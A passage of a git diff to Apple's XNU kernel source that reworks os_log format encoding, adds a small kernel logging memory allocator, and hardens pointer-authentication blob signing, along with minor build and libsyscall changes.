value.type.l = va_arg(args, long); - _os_log_encode_arg(&value.type.l, sizeof(value.type.l), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_LONGLONG: - value.type.ll = va_arg(args, long long); - _os_log_encode_arg(&value.type.ll, sizeof(value.type.ll), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_SIZE: - value.type.z = va_arg(args, size_t); - _os_log_encode_arg(&value.type.z, sizeof(value.type.z), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_INTMAX: - value.type.im = va_arg(args, intmax_t); - _os_log_encode_arg(&value.type.im, sizeof(value.type.im), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_PTRDIFF: - value.type.pd = va_arg(args, ptrdiff_t); - _os_log_encode_arg(&value.type.pd, sizeof(value.type.pd), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - default: - return false; - } - done = true; - break; - -#ifndef KERNEL - case '{': - // we do not support this for shimmed code - if (context->shimmed) { - return false; - } - - for (const char *curr2 = percent + 1; (ch = (*curr2)) != NUL; curr2++) { - if (ch == '}') { - strlcpy(annotated, percent, MIN(curr2 - (percent + 1), sizeof(annotated))); - context->annotated = annotated; - percent = curr2; - break; - } - } - break; -#endif /* !KERNEL */ - - case 'p': // pointer - value.type.p = va_arg(args, void *); - _os_log_encode_arg(&value.type.p, sizeof(value.type.p), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - done = true; - break; - -#ifndef KERNEL - case 'P': // pointer data - if (context->shimmed) { // we do not support this for shimmed code - return false; - } - - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - value.type.p = va_arg(args, void *); - - // capture the string pointer to generate a symptom - if (context->log && context->log->generate_symptoms && context->arg_idx == 1 && value.type.pch && prec) { - context->symptom_ptr = value.type.p; - context->symptom_ptr_len = prec; - } - - _os_log_encode_arg(value.type.p, prec, OS_LOG_BUFFER_VALUE_TYPE_POINTER, false, context); - prec = 0; - done = true; - break; -#endif /* !KERNEL */ - -#ifndef KERNEL - case 'L': // long double - long_double = true; - break; - - case 'a': case 'A': case 'e': case 'E': // floating types - case 'f': case 'F': case 'g': case 'G': - if (long_double) { - value.type.ld = va_arg(args, long double); - _os_log_encode_arg(&value.type.ld, sizeof(value.type.ld), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - } else { - value.type.d = va_arg(args, double); - _os_log_encode_arg(&value.type.d, sizeof(value.type.d), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - } - done = true; - break; -#endif /* !KERNEL */ - - case 'c': // char - value.type.ch = (char) va_arg(args, int); - _os_log_encode_arg(&value.type.ch, sizeof(value.type.ch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - done = true; - break; - -#ifndef KERNEL - case 'C': // wide-char - value.type.wch = va_arg(args, wint_t); - _os_log_encode_arg(&value.type.wch, sizeof(value.type.wch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - done = true; - break; -#endif /* !KERNEL */ - - case 's': // string - value.type.pch = va_arg(args, char *); - if (!prec && value.type.pch != NULL) { - prec = (int) strlen(value.type.pch) + 1; - } - -#ifndef KERNEL - // capture the string pointer to generate a symptom - if (context->log && context->log->generate_symptoms && context->arg_idx == 0 && value.type.pch) { - context->symptom_str = value.type.pch; - } -#endif - - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - _os_log_encode_arg(value.type.pch, prec, OS_LOG_BUFFER_VALUE_TYPE_STRING, false, context); - prec = 0; - done = true; - break; - -#ifndef KERNEL - case 'S': // wide-string - value.type.pwch = va_arg(args, wchar_t *); - if (!prec && value.type.pwch != NULL) { - prec = (int) wcslen(value.type.pwch) + 1; - } - - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - _os_log_encode_arg(value.type.pwch, prec, OS_LOG_BUFFER_VALUE_TYPE_STRING, false, context); - prec = 0; - done = true; - break; -#endif /* !KERNEL */ - -#ifndef KERNEL - case '@': // CFTypeRef aka NSObject * - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - _os_log_encode_arg(va_arg(args, void *), 0, OS_LOG_BUFFER_VALUE_TYPE_OBJECT, false, context); - done = true; - break; -#endif /* !KERNEL */ - - case 'm': - value.type.i = saved_errno; - _os_log_encode_arg(&value.type.i, sizeof(value.type.i), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - done = true; - break; - - default: - if (isdigit(ch)) { // [0-9] - continue; - } - return false; - } - - if (done) { - percent = strchr(percent, '%'); // Find next format - break; - } - } - } else { - percent = strchr(percent + 1, '%'); // Find next format after %% - } - } - - context->buffer->arg_cnt = context->arg_idx; - context->content_sz = context->content_off; - context->pubdata_sz = context->pubdata_off; - context->privdata_sz = context->privdata_off; - context->arg_idx = context->content_off = context->pubdata_off = context->privdata_off = 0; - - return true; -} +void os_log_context_init(os_log_context_t, logmem_t *, uint8_t *, size_t); +void os_log_context_free(os_log_context_t); +bool os_log_context_encode(os_log_context_t, const char *, va_list, void *, void *, bool); #endif /* log_encode_h */ diff --git a/libkern/os/log_encode_types.h b/libkern/os/log_encode_types.h index ac4b44bdb..23a995bd1 100644 --- a/libkern/os/log_encode_types.h +++ b/libkern/os/log_encode_types.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2015-2016 Apple Inc. All rights reserved. + * Copyright (c) 2015-2020 Apple Inc. All rights reserved. * * @APPLE_LICENSE_HEADER_START@ * @@ -36,24 +36,30 @@ #include #include +#include "log_mem.h" + #pragma mark - buffer support structures, enums -OS_ENUM(os_log_value_type, uint8_t, - OS_LOG_BUFFER_VALUE_TYPE_SCALAR = 0, - OS_LOG_BUFFER_VALUE_TYPE_COUNT = 1, - OS_LOG_BUFFER_VALUE_TYPE_STRING = 2, -#ifndef KERNEL - OS_LOG_BUFFER_VALUE_TYPE_POINTER = 3, - OS_LOG_BUFFER_VALUE_TYPE_OBJECT = 4, -#endif +OS_ENUM(os_log_fmt_hdr_flags, uint8_t, + OSLF_HDR_FLAG_HAS_PRIVATE = 0x01, + OSLF_HDR_FLAG_HAS_NON_SCALAR = 0x02, + ); + +OS_ENUM(os_log_fmt_cmd_type, uint8_t, + OSLF_CMD_TYPE_SCALAR = 0, // %u, %lld, %x, %p, %g, ... + OSLF_CMD_TYPE_COUNT = 1, // %.16P, %.*s + OSLF_CMD_TYPE_STRING = 2, // %s + OSLF_CMD_TYPE_POINTER = 3, // %P + OSLF_CMD_TYPE_OBJECT = 4, // %@ + OSLF_CMD_TYPE_WIDE_STRING = 5, // %S + OSLF_CMD_TYPE_ERRNO = 6, // %m + OSLF_CMD_TYPE_MASK = 7, // %{mask.foo}... ); -OS_ENUM(os_log_value_subtype, uint8_t, - OS_LOG_BUFFER_VALUE_SUBTYPE_NONE = 0, - OS_LOG_BUFFER_VALUE_SUBTYPE_INTEGER = 1, -#ifndef KERNEL - OS_LOG_BUFFER_VALUE_SUBTYPE_FLOAT = 2, -#endif +OS_ENUM(os_log_fmt_cmd_flags, uint8_t, + OSLF_CMD_FLAG_PRIVATE = 0x1, + OSLF_CMD_FLAG_PUBLIC = 0x2, + OSLF_CMD_FLAG_SENSITIVE = 0x4 | OSLF_CMD_FLAG_PRIVATE, ); enum os_log_int_types_t { @@ -67,7 +73,7 @@ enum os_log_int_types_t { OST_PTRDIFF = 5, }; -union os_log_format_types_u { +union os_log_fmt_types_u { uint16_t u16; uint32_t u32; uint64_t u64; @@ -76,100 +82,53 @@ union os_log_format_types_u { int i; void *p; char *pch; -#ifndef KERNEL - wchar_t wch; - wchar_t *pwch; -#endif size_t z; intmax_t im; ptrdiff_t pd; long l; long long ll; -#ifndef KERNEL - double d; - float f; - long double ld; -#endif }; typedef struct os_log_format_value_s { - union os_log_format_types_u type; - os_log_value_type_t ctype; + union os_log_fmt_types_u type; + os_log_fmt_cmd_type_t ctype; uint16_t size; } *os_log_format_value_t; -#define OST_FORMAT_MAX_ARGS 48 -#ifdef KERNEL -#define OST_FORMAT_MAX_STRING_SIZE 512 -#else -#define OST_FORMAT_MAX_STRING_SIZE 1024 -#endif - -#define OST_FORMAT_NON_STATIC ~0 - -typedef struct os_log_buffer_value_s { -#define OS_LOG_CONTENT_FLAG_PRIVATE 0x1 - uint8_t flags : 4; - os_log_value_type_t type : 4; - uint8_t size; - uint8_t value[]; -} *os_log_buffer_value_t; - -typedef struct os_log_buffer_s { -#define OS_LOG_BUFFER_HAS_PRIVATE 0x1 -#define OS_LOG_BUFFER_HAS_NON_SCALAR 0x2 - uint8_t flags; - uint8_t arg_cnt; - uint8_t content[]; -} *os_log_buffer_t; - -typedef struct os_log_buffer_context_s { - os_log_t log; - os_log_buffer_t buffer; - uint8_t *pubdata; - uint8_t *privdata; - - // composed string - char *comp; - size_t comp_off; - size_t comp_sz; - - // sizes and offsets - uint16_t content_off; // offset into buffer->content - uint16_t content_sz; // size not including the header - uint16_t pubdata_off; - uint16_t pubdata_sz; - uint16_t privdata_off; - uint16_t privdata_sz; - - uint8_t arg_idx; - - // if argument content was limited with %.* or %.# - -#ifndef KERNEL - const char *symptom_str; - const void *symptom_ptr; - uint16_t symptom_ptr_len; - char *annotated; -#endif - int arg_content_sz; - bool need_size; - bool shimmed; -} *os_log_buffer_context_t; - -typedef struct os_log_arginfo_s { - uint16_t offset; - uint16_t length; -} *os_log_arginfo_t; - -/* Clients of these interfaces/structures may be expected to provide implementations of the following functions */ +typedef struct os_log_fmt_hdr_s { + os_log_fmt_hdr_flags_t hdr_flags; + uint8_t hdr_cmd_cnt; + uint8_t hdr_data[]; +} *os_log_fmt_hdr_t; -#ifndef KERNEL -extern bool -_NSCF2data(const void *obj, char *string_value, size_t string_sz, bool *is_private); -#endif +typedef struct os_log_fmt_cmd_s { + os_log_fmt_cmd_flags_t cmd_flags : 4; + os_log_fmt_cmd_type_t cmd_type : 4; + uint8_t cmd_size; + uint8_t cmd_data[]; +} *os_log_fmt_cmd_t; -extern bool -_os_log_string_is_public(const char *str); +typedef struct os_log_fmt_range_s { + uint16_t offset; + uint16_t length : 15; + uint16_t truncated : 1; +} *os_log_fmt_range_t; + +#define OS_LOG_MAX_PUB_ARGS (32) + +typedef struct os_log_context_s { + logmem_t *ctx_logmem; + uint8_t *ctx_buffer; + size_t ctx_buffer_sz; + os_log_fmt_hdr_t ctx_hdr; + char *ctx_pubdata[OS_LOG_MAX_PUB_ARGS]; + uint16_t ctx_content_off; // offset into buffer->hdr_data + uint16_t ctx_content_sz; // size not including the header + uint16_t ctx_pubdata_sz; + uint16_t ctx_pubdata_cnt; + firehose_tracepoint_flags_t ctx_ft_flags; + uint8_t ctx_truncated : 1; + uint8_t ctx_allocated : 1; +} *os_log_context_t; #endif /* log_encode_types_h */ diff --git a/libkern/os/log_mem.c b/libkern/os/log_mem.c new file mode 100644 index 000000000..311082b9a --- /dev/null +++ b/libkern/os/log_mem.c @@ -0,0 +1,217 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include + +#include "log_mem.h" + +#define BLOCK_INVALID ((size_t)-1) +#define BLOCK_LEVEL_BASE(level) ((1 << (level)) - 1) +#define BLOCK_SIZE(level) (1 << (level)) +#define BLOCK_PARENT(b) (((b) % 2 == 0) ? ((b) >> 1) - 1 : ((b) >> 1)) +#define BLOCK_LCHILD(b) (((b) << 1) + 1) +#define BLOCK_BUDDY(b) (((b) & 0x1) ? (b) + 1 : (b) - 1) +#define BLOCK_INDEX(lm, l, a, s) \ + (BLOCK_LEVEL_BASE(l) + ((uintptr_t)(a) - (uintptr_t)(lm)->lm_mem) / (s)) + +#define BITMAP_BUCKET_SIZE (8 * sizeof(((logmem_t *)0)->lm_mem_map[0])) +#define BITMAP_BUCKET(i) ((i) / BITMAP_BUCKET_SIZE) +#define BITMAP_BIT(i) (1 << (BITMAP_BUCKET_SIZE - ((i) % BITMAP_BUCKET_SIZE) - 1)) + +static bool +bitmap_get(logmem_t *lm, size_t block) +{ + return lm->lm_mem_map[BITMAP_BUCKET(block)] & BITMAP_BIT(block); +} + +static void +bitmap_set(logmem_t *lm, size_t block) +{ + lm->lm_mem_map[BITMAP_BUCKET(block)] |= BITMAP_BIT(block); +} + +static void +bitmap_clear(logmem_t *lm, size_t block) +{ + lm->lm_mem_map[BITMAP_BUCKET(block)] &= ~BITMAP_BIT(block); +} + +static void +bitmap_reserve_root(logmem_t *lm, size_t block) +{ + const size_t top_block = BLOCK_LEVEL_BASE(lm->lm_cap_order - lm->lm_max_order); + + for (ssize_t next = BLOCK_PARENT(block); next >= top_block; next = BLOCK_PARENT(next)) { + /* + * If the rest of the root path is already marked as + * allocated we are done. + */ + if (bitmap_get(lm, next)) { + break; + } + bitmap_set(lm, next); + } +} + +static void +bitmap_release_root(logmem_t *lm, size_t block) +{ + const size_t top_block = BLOCK_LEVEL_BASE(lm->lm_cap_order - lm->lm_max_order); + int buddy_allocated = 0; + + while (block > top_block) { + buddy_allocated = bitmap_get(lm, BLOCK_BUDDY(block)); + block = BLOCK_PARENT(block); + /* + * If there is another allocation within the parent subtree + * in place we cannot mark the rest of the root path as free. + */ + if (buddy_allocated) { + break; + } + bitmap_clear(lm, block); + } +} + +static void +bitmap_update_subtree(logmem_t *lm, size_t level, size_t block, void (*fun)(logmem_t *, size_t)) +{ + const size_t lcount = lm->lm_cap_order - lm->lm_min_order - level + 1; + + for (size_t l = 0, n = 1; l < lcount; l++, n <<= 1) { + for (int i = 0; i < n; i++) { + fun(lm, block + i); + } + block = BLOCK_LCHILD(block); + } +} + +static void +bitmap_release_subtree(logmem_t *lm, size_t level, size_t block) +{ + bitmap_update_subtree(lm, level, block, bitmap_clear); +} + +static void +bitmap_reserve_subtree(logmem_t *lm, size_t level, size_t block) +{ + bitmap_update_subtree(lm, level, block, bitmap_set); +} + +static size_t +block_size_level(logmem_t *lm, size_t amount) +{ + for (size_t l = lm->lm_min_order; l <= lm->lm_max_order; l++) { + if (amount <= BLOCK_SIZE(l)) { + return lm->lm_cap_order - l; + } + } + return BLOCK_INVALID; +} + +static size_t +block_locate(logmem_t *lm, void *addr, size_t amount, size_t *block) +{ + size_t level = block_size_level(lm, amount); + if (level != BLOCK_INVALID) { + *block = BLOCK_INDEX(lm, level, addr, amount); + } + return level; +} + +static size_t +block_reserve(logmem_t *lm, size_t level) +{ + assert(level != BLOCK_INVALID); + + const size_t base = BLOCK_LEVEL_BASE(level); + const size_t end = base + BLOCK_SIZE(level); + + lck_spin_lock(lm->lm_lock); + for (size_t block = base; block < end; block++) { + if (!bitmap_get(lm, block)) { + bitmap_reserve_root(lm, block); + bitmap_reserve_subtree(lm, level, block); + lck_spin_unlock(lm->lm_lock); + return block - base; + } + } + lck_spin_unlock(lm->lm_lock); + + return BLOCK_INVALID; +} + +void * +logmem_alloc(logmem_t *lm, size_t *amount) +{ + assert(amount); + + os_atomic_inc(&lm->lm_cnt_allocations, relaxed); + + if (*amount == 0 || *amount > BLOCK_SIZE(lm->lm_max_order)) { + os_atomic_inc(&lm->lm_cnt_failed_size, relaxed); + return NULL; + } + + size_t level = block_size_level(lm, *amount); + size_t block = block_reserve(lm, level); + + if (block == BLOCK_INVALID) { + os_atomic_inc(&lm->lm_cnt_failed_full, relaxed); + return NULL; + } + + *amount = BLOCK_SIZE(lm->lm_cap_order - level); + os_atomic_sub(&lm->lm_cnt_free, (uint32_t)*amount, relaxed); + + return &lm->lm_mem[block * *amount]; +} + +void +logmem_free(logmem_t *lm, void *addr, size_t amount) +{ + assert(addr); + assert(amount > 0 && ((amount & (amount - 1)) == 0)); + + size_t block = BLOCK_INVALID; + size_t level = block_locate(lm, addr, amount, &block); + assert(level != BLOCK_INVALID); + assert(block != BLOCK_INVALID); + + lck_spin_lock(lm->lm_lock); + bitmap_release_root(lm, block); + bitmap_release_subtree(lm, level, block); + lck_spin_unlock(lm->lm_lock); + + os_atomic_add(&lm->lm_cnt_free, (uint32_t)amount, relaxed); +} + +size_t +logmem_max_size(const logmem_t *lm) +{ + return BLOCK_SIZE(lm->lm_max_order); +} diff --git a/libkern/os/log_mem.h b/libkern/os/log_mem.h new file mode 100644 index 000000000..d29ca2b19 --- /dev/null +++ b/libkern/os/log_mem.h @@ -0,0 +1,84 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#ifndef log_mem_h +#define log_mem_h + +#include +#include + +/* + * A simple allocator on a top of a plain byte array. Primarily intended to + * support OS kernel logging in order to avoid dependency to VM. + */ +typedef struct logmem_s { + lck_spin_t *lm_lock; + uint8_t *lm_mem; + uint8_t *lm_mem_map; + size_t lm_cap_order; + size_t lm_min_order; + size_t lm_max_order; + uint32_t lm_cnt_allocations; + uint32_t lm_cnt_failed_size; + uint32_t lm_cnt_failed_full; + uint32_t lm_cnt_free; +} logmem_t; + +/* + * Static initializer for global instances of logmem. Size order defines the + * total amount of logmem memory, the min and max order set the minimum and the + * maximum size respectively of the memory allocatable by the given logmem. + * Local or dynamically allocated instances of logmem should not be initialized + * by this macro. + */ +#define LOGMEM_STATIC_INIT(name, size_order, min_order, max_order) \ + SIMPLE_LOCK_DECLARE(name##_lck, 0); \ + logmem_t name = { \ + .lm_lock = (lck_spin_t *)&name##_lck, \ + .lm_mem = (uint8_t[(1 << (size_order))]){ 0 }, \ + .lm_mem_map = (uint8_t[MAX(1, (1 << ((size_order) - (min_order) + 1)) / 8)]){ 0 }, \ + .lm_cap_order = (size_order), \ + .lm_max_order = (max_order), \ + .lm_min_order = (min_order), \ + .lm_cnt_free = (1 << (size_order)) \ + }; + +/* + * Allocates memory from a respective logmem. Returns a pointer to the beginning + * of the allocated block. The resulting size of the allocated block is equal or + * bigger than the size passed in during the call. + */ +void *logmem_alloc(logmem_t *, size_t *); + +/* + * Frees memory previously allocated by logmem_alloc(). The caller must call + * logmem_free() with exact pointer and size value returned by logmem_alloc(). + */ +void logmem_free(logmem_t *, void *, size_t); + +/* + * Returns the maximum memory size allocatable by the logmem. + */ +size_t logmem_max_size(const logmem_t *); + +#endif /* log_mem_h */ diff --git a/libkern/ptrauth_utils.c b/libkern/ptrauth_utils.c index 8385a23d1..cd0ddceac 100644 --- a/libkern/ptrauth_utils.c +++ b/libkern/ptrauth_utils.c @@ -40,8 +40,9 @@ * Sign a blob of data with the GA key * */ +__attribute__((noinline)) ptrauth_generic_signature_t -ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags) +ptrauth_utils_sign_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags) { ptrauth_generic_signature_t sig = 0; @@ -58,22 +59,31 @@ ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int data ^= (uint64_t)ptr; } - /* First round adds salt */ + /* First round adds ptrauth_utils_sign_blob_generic discrimination. */ + sig = ptrauth_sign_generic_data(sig, ptrauth_string_discriminator("ptrauth_utils_sign_blob_generic-prologue") | 0x01); + + /* Second round adds salt */ sig = ptrauth_sign_generic_data(sig, data); /* Calculate an additive signature of the buffer */ for (uint64_t i = 0; i < rounds; i++) { - sig = ptrauth_sign_generic_data(*(uintptr_t *)ptr, sig); + sig = ptrauth_sign_generic_data(*(const uintptr_t *)ptr, sig); ptr += sizeof(uintptr_t); } /* ptrauth_sign_generic_data operates on pointer-sized values only, * so we need to handle trailing bytes for the non-pointer-aligned case */ if (ntrailing) { - memcpy(&trailing, ptr, ntrailing); + for (int i = 0; i < ntrailing; i++) { + ((uint8_t *)&trailing)[i] = ((const uint8_t *)ptr)[i]; + } sig = ptrauth_sign_generic_data(trailing, sig); } + + /* Final round to add an additional cookie */ + sig = ptrauth_sign_generic_data(sig, ptrauth_string_discriminator("ptrauth_utils_sign_blob_generic-epilogue") | 0x01); + return sig; } @@ -82,8 +92,9 @@ ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int * * Authenticate signature produced by ptrauth_utils_sign_blob_generic */ +__attribute__((noinline)) void -ptrauth_utils_auth_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature) +ptrauth_utils_auth_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature) { ptrauth_generic_signature_t calculated_signature = 0; diff --git a/libsa/conf/Makefile.template b/libsa/conf/Makefile.template index 308dc426a..b20de6a3d 100644 --- a/libsa/conf/Makefile.template +++ b/libsa/conf/Makefile.template @@ -68,7 +68,9 @@ KLD_FILES = $(OBJS) $(COMPONENT).filelist: $(OBJS) $(_v)for kld_file in ${KLD_FILES}; do \ - $(SEG_HACK) -n __KLD -o $${kld_file}__ $${kld_file} || exit 1; \ + $(SEG_HACK) -s __TEXT -n __KLD -o $${kld_file}__ $${kld_file} || exit 1; \ + mv $${kld_file}__ $${kld_file} || exit 1; \ + $(SEG_HACK) -i __KLD -n __KLDDATA -o $${kld_file}__ $${kld_file} || exit 1; \ mv $${kld_file}__ $${kld_file} || exit 1; \ done @$(LOG_LDFILELIST) "$(COMPONENT)" diff --git a/libsyscall/Libsyscall.xcconfig b/libsyscall/Libsyscall.xcconfig index 15531c0fe..6255b46ca 100644 --- a/libsyscall/Libsyscall.xcconfig +++ b/libsyscall/Libsyscall.xcconfig @@ -63,11 +63,6 @@ CLANG_WARN_SUSPICIOUS_MOVE = YES CODE_SIGN_IDENTITY = - DYLIB_CURRENT_VERSION = $(RC_ProjectSourceVersion) DYLIB_LDFLAGS = -umbrella System -all_load -DYLIB_LDFLAGS[sdk=iphoneos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000 -DYLIB_LDFLAGS[sdk=watchos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000 -DYLIB_LDFLAGS[sdk=tvos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000 -DYLIB_LDFLAGS[sdk=appletvos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000 -DYLIB_LDFLAGS[sdk=bridgeos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000 OTHER_LDFLAGS = $(SIMULATOR_LDFLAGS) SIMULATOR_LDFLAGS = SIMULATOR_LDFLAGS[sdk=macosx*] = -Wl,-simulator_support diff --git a/libsyscall/Libsyscall.xcodeproj/project.pbxproj b/libsyscall/Libsyscall.xcodeproj/project.pbxproj index 05e980948..74584782f 100644 --- a/libsyscall/Libsyscall.xcodeproj/project.pbxproj +++ b/libsyscall/Libsyscall.xcodeproj/project.pbxproj @@ -116,6 +116,7 @@ 24B8C2621237F53900D36CC3 /* remove-counter.c in Sources */ = {isa = PBXBuildFile; fileRef = 24B8C2611237F53900D36CC3 /* remove-counter.c */; }; 24D1158311E671B20063D54D /* SYS.h in Headers */ = {isa = PBXBuildFile; fileRef = 24D1157411E671B20063D54D /* SYS.h */; }; 24E4782712088267009A384D /* _libc_funcptr.c in Sources */ = {isa = PBXBuildFile; fileRef = 24E47824120881DF009A384D /* _libc_funcptr.c */; }; + 2561E8AA25082E6300EAA925 /* task.c in Sources */ = {isa = PBXBuildFile; fileRef = 2561E8A925082E6300EAA925 /* task.c */; }; 291D3C281354FDD100D46061 /* mach_port.c in Sources */ = {isa = PBXBuildFile; fileRef = 291D3C261354FDD100D46061 /* mach_port.c */; }; 291D3C291354FDD100D46061 /* mach_vm.c in Sources */ = {isa = PBXBuildFile; fileRef = 291D3C271354FDD100D46061 /* mach_vm.c */; }; 29A59AE2183B0DE000E8B896 /* renameat.c in Sources */ = {isa = PBXBuildFile; fileRef = 29A59AE1183B0DE000E8B896 /* renameat.c */; }; @@ -553,6 +554,7 @@ 24D1159811E672270063D54D /* syscall.map */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text; path = syscall.map; sourceTree = ""; }; 24D1159911E6723E0063D54D /* create-syscalls.pl */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.script.perl; path = "create-syscalls.pl"; sourceTree = ""; }; 24E47824120881DF009A384D /* _libc_funcptr.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = _libc_funcptr.c; sourceTree = ""; }; + 2561E8A925082E6300EAA925 /* task.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = task.c; sourceTree = ""; }; 291D3C261354FDD100D46061 /* mach_port.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = mach_port.c; sourceTree = ""; }; 291D3C271354FDD100D46061 /* mach_vm.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = mach_vm.c; sourceTree = ""; }; 29A59AE1183B0DE000E8B896 /* renameat.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = renameat.c; sourceTree = ""; }; @@ -761,6 +763,7 @@ C9D9BCCC114B00600000D8B9 /* err_libkern.sub */, C9D9BCCD114B00600000D8B9 /* err_mach_ipc.sub */, C9D9BCCE114B00600000D8B9 /* err_server.sub */, + 2561E8A925082E6300EAA925 /* task.c */, C9D9BCCF114B00600000D8B9 /* err_us.sub */, C9D9BCD0114B00600000D8B9 /* error_codes.c */, C9D9BCD1114B00600000D8B9 /* errorlib.h */, @@ -1487,6 +1490,7 @@ 24A7C5C111FF8DA6007669EB /* getsockname.c in Sources */, 925559921CBC23C300E527CE /* mach_boottime.c in Sources */, 24A7C5C211FF8DA6007669EB /* lchown.c in Sources */, + 2561E8AA25082E6300EAA925 /* task.c in Sources */, 24A7C5C311FF8DA6007669EB /* listen.c in Sources */, 24A7C5C411FF8DA6007669EB /* recvfrom.c in Sources */, 13CBF78224575F9F00B26F7D /* open-base.c in Sources */, diff --git a/libsyscall/mach/.gitignore b/libsyscall/mach/.gitignore deleted file mode 100644 index f718d68d2..000000000 --- a/libsyscall/mach/.gitignore +++ /dev/null @@ -1,3 +0,0 @@ -*.pbxuser -*.perspectivev3 -build/ diff --git a/libsyscall/mach/host.c b/libsyscall/mach/host.c index 6a7ec639e..6d977fd59 100644 --- a/libsyscall/mach/host.c +++ b/libsyscall/mach/host.c @@ -37,8 +37,7 @@ kern_return_t host_get_atm_diagnostic_flag(host_t host __unused, uint32_t *diagnostic_flag) { - volatile uint32_t *diagnostic_flag_address = (volatile uint32_t *)(uintptr_t)(_COMM_PAGE_ATM_DIAGNOSTIC_CONFIG); - *diagnostic_flag = *diagnostic_flag_address; + *diagnostic_flag = COMM_PAGE_READ(uint32_t, ATM_DIAGNOSTIC_CONFIG); return KERN_SUCCESS; } @@ -47,8 +46,7 @@ host_get_multiuser_config_flags(host_t host __unused, uint32_t *multiuser_flags) { #if (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) - volatile uint32_t *multiuser_flag_address = (volatile uint32_t *)(uintptr_t)(_COMM_PAGE_MULTIUSER_CONFIG); - *multiuser_flags = *multiuser_flag_address; + *multiuser_flags = COMM_PAGE_READ(uint32_t, MULTIUSER_CONFIG); return KERN_SUCCESS; #else (void)multiuser_flags; diff --git a/libsyscall/mach/mach/mach_init.h b/libsyscall/mach/mach/mach_init.h index 4d9d51f46..e223fc8e2 100644 --- a/libsyscall/mach/mach/mach_init.h +++ b/libsyscall/mach/mach/mach_init.h @@ -64,6 +64,10 @@ #include +#ifndef KERNEL +#include +#endif + /* * Kernel-related ports; how a task/thread controls itself */ @@ -71,6 +75,8 @@ __BEGIN_DECLS extern mach_port_t mach_host_self(void); extern mach_port_t mach_thread_self(void); +__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3)) +extern boolean_t mach_task_is_self(task_name_t task); extern kern_return_t host_page_size(host_t, vm_size_t *); extern mach_port_t mach_task_self_; diff --git a/libsyscall/mach/mach/port_descriptions.h b/libsyscall/mach/mach/port_descriptions.h index e237e2757..f96418b4b 100644 --- a/libsyscall/mach/mach/port_descriptions.h +++ b/libsyscall/mach/mach/port_descriptions.h @@ -44,6 +44,12 @@ const char *mach_host_special_port_description(int offset); */ const char *mach_task_special_port_description(int offset); +/* + * Returns a string describing the thread special port offset provided, or NULL if + * the provided 